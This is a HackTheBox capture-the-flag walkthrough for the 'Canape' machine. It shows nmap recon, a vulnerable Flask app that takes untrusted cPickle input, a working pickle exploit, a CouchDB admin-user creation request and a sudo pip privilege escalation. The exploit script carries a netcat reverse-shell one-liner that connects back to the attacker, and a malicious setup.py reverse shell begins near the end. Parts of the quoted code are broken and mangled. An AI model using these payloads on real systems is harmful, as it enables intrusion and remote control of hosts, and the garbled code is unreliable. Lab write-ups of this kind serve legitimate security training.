In this post we will resolve the machine Canape from HackTheBox. It’s a medium level Linux Machine and one of my favorites.

My nick in HackTheBox is: manulqwerty. If you have any proposal or correction do not hesitate to leave a comment.



As always, the first thing will be a scan of all the ports with nmap :

nmap -p-
nmap -sC -sV -p80,65535

As we read in the nmap output, there is a git that could have something interesting. Let’s download and review it:

git clone http://git.canape.htb

We add the line ‘ git.canape.htb canape.htb ‘ to our file /etc/hosts

Now let’s review the web:

It is a fan page of the Simpsons. Let’s see what’s in the git:

The only interesting file seems to be the

import couchdb
import string
import random
import base64
import cPickle
from flask import Flask, render_template, request
from hashlib import md5

app = Flask(__name__)
    DATABASE = "simpsons"
db = couchdb.Server("http://localhost:5984/")[app.config["DATABASE"]]

def page_not_found(e):
    if random.randrange(0, 2) > 0:
        return ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(random.randrange(50, 250)))
	return render_template("index.html")

def index():
    return render_template("index.html")

def quotes():
    quotes = []
    for id in db:
        quotes.append({"title": db[id]["character"], "text": db[id]["quote"]})
    return render_template('quotes.html', entries=quotes)


@app.route("/submit", methods=["GET", "POST"])
def submit():
    error = None
    success = None

    if request.method == "POST":
            char = request.form["character"]
            quote = request.form["quote"]
            if not char or not quote:
                error = True
            elif not any(c.lower() in char.lower() for c in WHITELIST):
                error = True
                # TODO - Pickle into dictionary instead, `check` is ready
                p_id = md5(char + quote).hexdigest()
                outfile = open("/tmp/" + p_id + ".p", "wb")
		outfile.write(char + quote)
	        success = True
        except Exception as ex:
            error = True

    return render_template("submit.html", error=error, success=success)

@app.route("/check", methods=["POST"])
def check():
    path = "/tmp/" + request.form["id"] + ".p"
    data = open(path, "rb").read()

    if "p1" in data:
        item = cPickle.loads(data)
        item = data

    return "Still reviewing: " + item

if __name__ == "__main__":

In this file we see how the page works ( http: //canape.htb ). We see that in the field ‘char’ of / submit we must add some of the elements of WHITELIST , instead the field ‘quote ‘ has no restrictions and we can include whatever we want. A file will be created in /tmp whose name will be char + quote in MD5 and with the extension .p that corresponds to the extension of a Pickle file, the contents of this file will be char + quote .
We also see that if we make a POST request appropriate to /check (the id parameter must be the char + quote in MD5 that we will have sent to /submit), the system will execute the cPickle.loads method of the content of the file that is created in /submit .

We’re going to look for Pickle vulnerabilities:

We found:
On this page we find a small script that will allow us to create our payload:

import os
import cPickle

# Exploit that we want the target to unpickle
class Exploit(object):
    def __reduce__(self):
        return (os.system, ('ls',))

shellcode = cPickle.dumps(Exploit())
print shellcode

As we see in the gif, cPickle.loads will execute as a system command the content of shellcode .
As we saw in the in the field ‘char’ of our payload we must add the name of some character, let’s see how to bypass this:

Obviously the command ‘homer’ can not find it but the pwd does execute it.


With all the previous tests we can now create our payload:

import os
import cPickle
from hashlib import md5
import requests

class Exploit(object):
	def __reduce__(self):
		return (os.system, ('homer:;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 7777 >/tmp/f',))

shellcode = cPickle.dumps(Exploit())"", data={'character': shellcode.split(":")[0], 'quote': shellcode.split(":")[1]})"", data={'id': md5(shellcode.split(":")[0] + shellcode.split(":")[1]).hexdigest()})


Checking the output of the or with netstat we see that it is listening on port 5984, which corresponds to CouchDB.

netstat -plnt


Let’s look for CouchDB vulnerabilities in version 2.0.0:
That will allow us to create a user with permissions to read the databases.

curl -X PUT 'http://localhost:5984/_users/org.couchdb.user:oops' --data-binary '{"type": "user",  "name": "manuqwerty","roles": ["_admin"],"roles": [],"password": "password"}'
curl -u oops:password

In the output of this commands:


In the file /etc/passwd we found that a homer user exists:

Once we are homer we can access the first flag. The next step will be to see if we can execute something as root:

sudo -l

As you can see we can run pip install * as root!
Abusing this, to read the flag will suffice with:

sudo pip install -r /root/root.txt

If we want to get shell as root, we can create a malicious file that will returns us shell:

import socket
import subprocess
import os


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